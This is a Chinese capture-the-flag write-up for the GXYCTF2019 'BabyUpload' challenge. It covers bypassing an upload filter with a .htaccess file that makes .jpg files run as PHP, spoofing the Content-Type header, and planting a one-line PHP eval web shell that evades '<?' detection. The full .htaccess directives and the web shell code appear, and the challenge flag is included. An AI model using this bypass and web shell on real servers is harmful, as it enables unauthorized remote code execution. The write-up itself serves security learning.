[GXYCTF2019]BabyUpload

1. 猜测直接上传txt会被过滤，提示“上传类型也太露骨了吧！”
2. 按经验传入一个"muma.phtml"
   提示过滤了“ph”相关的后缀
   
3. 传入muma.jpg等图像格式，提示表明复原并检测了文件内容
   

审查文件后缀Context-type 不能有ph，image/jpeg可以
审查文件内容 不能是php
黑名单过滤

查阅wp，需要利用 .htaccess文件解析漏洞，并参考以下博客内容：

说人话就是，它可以把同目录下指定的某类后缀的文件解析成php代码执行.
原理：.htaccess文件(或者"分布式配置文件"）,全称是Hypertext Access(超文本入口)。提供了针对目录改变配置的方法， 即，在一个特定的文档目录中放置一个包含一个或多个指令的文件， 以作用于此目录及其所有子目录。作为用户，所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置。
漏洞复现篇——.htaccess文件解析漏洞

逻辑上先传一个.htaccess文件（指定jpg格式被解析为php代码执行）上去，试试会不会被过滤
如果成功，再传一个修改为php后缀的木马文件，尝试通过木马控制
如果失败，需要寻找其他方法

<FilesMatch "muma.jpg">
SetHandler application/x-httpd-php   #在当前目录下，如果匹配到muma.jpg文件，则被解析成PHP代码执行
AddHandler php5-script .jpg         #在当前目录下，如果匹配到muma.jpg文件，则被解析成PHP代码执行
</FilesMatch>

文件名也被过滤了？修改文件名重新尝试

还是不行，参考多篇博文，注意php版本

更改语法格式，绕过以检测<?为方式检测php代码的手段

<? ?> —— < script language=“php”>< /script >

<script language="php"> eval($_POST['attack']);</script>

重新开始，上传.htaccess文件，必须要修改Content-Type: 为image/jpeg


参考博文：https://blog.csdn.net/RABCDXB/article/details/114297306

上传muma.jpg，成功

打开AntSword，连接木马
失败

重置靶机，修改木马文件后缀为png尝试(同样必须改Context-Type：image/png 为 image/jpeg)
成功连上
在根目录找到flag：flag{0e953d11-d228-4853-bca6-a7f86032756a}

本篇总结：

1. 一句话木马的变形，以绕过某些形式上的（例如对<? ?>）php内容检测
2. 什么情况下可以利用web服务器.htaccess文件解析漏洞？